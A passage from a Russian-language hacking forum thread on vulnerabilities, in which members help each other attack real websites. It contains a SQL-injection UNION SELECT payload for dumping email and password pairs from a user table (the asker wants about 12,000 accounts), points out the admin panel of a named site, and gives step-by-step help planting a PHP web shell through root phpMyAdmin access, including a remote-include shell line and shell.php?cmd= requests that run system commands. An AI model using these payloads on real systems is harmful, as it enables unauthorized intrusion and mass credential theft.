Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    что вы имеете в виду "если уязвимо s_users" вопрос не понятен..
     
  3. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    s_users это таблица из нее нужно вывести email: password.
     
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    кэсов??????? это что вообще такое???
     
  5. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Тысяч! :D
     
  6. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    union+select+concat_ws(0x2f,mail,password)+from+s_users+limit+1,1-- 
    
    чет тебя вообще не понятно :/
     
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Дампить лимитом 12 тысяч учеток вручную?=)
    Ты что? :)
     
  8. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Нет, мне нужен пример цикла вывода в браузер, с моими параметрами....
    Она дампит, эта прога только до 4 лимита....
     
  9. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Йа кибарк.
     
    1 person likes this.
  10. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Не понимаю, если есть проблема и ты не знаешь как помочь, почему нужно вину валить на другого?
    Я по-моему ясно объяснил что мне не нужны программы для дампа, мне просто нужен пример составления цикла вывода инъекции.
     
  11. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    А в чём собственно проблема? :eek: Бери да пиши на PHP цикл и крути limit
     
  12. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Вот скрипт от Dr.Z3r0:
    Крутит через лимит запросы.
     
  13. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
    например /:
    [​IMG]

    Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
     
  14. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Ссылку дайте, видимо у вас что-то с кодировкой.
     
  15. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    Думаю, что с кодировкой все нормально, так как с чтением файлов проблем нет.
     
  16. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет, подскажите плз, где админка в http://www.runiga.ru/ ?
     
  17. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.runiga.ru/panel/
     
  18. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Народ) кто знает почему такие траблы при залитии шелла через phpmyadmin
    Вообщем имею доступ к пхпмайадмин под root'om с полными правами.
    хочу залить шелл.
    Мучу такой запрос:
    После второго запроса получаю такую ошибку:
    Кто знает почему вылазит эта ошибка?

    Пробовал другой выриант:
    Создается файл в корневой директории сайта.
    Но при запросе http://www.site.ru/shell.php?cmd=dir получаю такую ошибку :
    Что не так делаю? = \
     
  19. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    GroM88

    В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:

    PHP:
    INSERT INTRO `tableshell` (`shell`) VALUES ("<? include ('http://site.narod.ru/shell.php'); ?>")
    А если учесть, что не на всех серверах включена директива short_open_tag, то так:

    PHP:
    INSERT INTRO `tableshell` (`shell`) VALUES ("<?php include ('http://site.narod.ru/shell.php'); ?>")
    Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.

    Во втором случае, нарушен синтаксис и отсутствует логика.

    Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:
    PHP:
    http://www.site.ru/shell.php?cmd=phpinfo();
    Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.

    О функциях исполнения системных команд и их различиях, можешь почитать тут http://www.php.su/functions/?cat=exec

    Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):

    PHP:
    http://www.site.ru/shell.php?cmd=echo `dir`;
    http://www.site.ru/shell.php?cmd=passthru('dir');
    http://www.site.ru/shell.php?cmd=system('dir');
     
    #15379 h00lyshit!, 16 Nov 2010
    Last edited: 16 Nov 2010
    4 people like this.
  20. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    это больше на накрутку чего то тянет, по указанному выше адресу попадаем на страницу с фреймом где по идее юзеру парят примерно следующие куки
    Set-Cookie: SL_003_0000=_10000_; domain=telefon4je.info; path=/; expires=Sat, 20-Nov-2010 18:35:15 GMT
    Set-Cookie: TSUSER=003; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=telefon4je.info
    Set-Cookie: SL_2_0000=_0_; domain=telefon4je.info; path=/; expires=Wed, 17-Nov-2010 14:35:15 GMT и переадресовывают 302 редиректом сюда new-xmading.ru
     
Thread Status:
Not open for further replies.